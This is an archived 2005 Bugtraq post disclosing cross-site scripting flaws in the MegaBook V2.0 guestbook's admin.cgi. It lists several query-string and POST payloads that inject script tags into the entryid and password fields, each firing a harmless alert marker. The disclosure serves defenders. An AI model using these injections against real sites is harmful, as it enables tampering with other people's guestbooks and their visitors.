[38724] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

MegaBook V2.0 - Cross Site Scripting Exploit

daemon@ATHENA.MIT.EDU (Spy Hat)
Thu May 5 14:00:48 2005

Date: 5 May 2005 10:45:51 -0000
Message-ID: <20050505104551.23441.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Spy Hat <spyhat@spyhat.com>
To: bugtraq@securityfocus.com



The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi 

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 

I have tested the script with the following query:

?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;

I have also tested the script with theses POST variables:

action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;

action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;

action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;

action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;

action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;


Yours,
SpyHat


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[38724] in bugtraq

MegaBook V2.0 - Cross Site Scripting Exploit

daemon@ATHENA.MIT.EDU (Spy Hat)Thu May 5 14:00:48 2005

daemon@ATHENA.MIT.EDU (Spy Hat)
Thu May 5 14:00:48 2005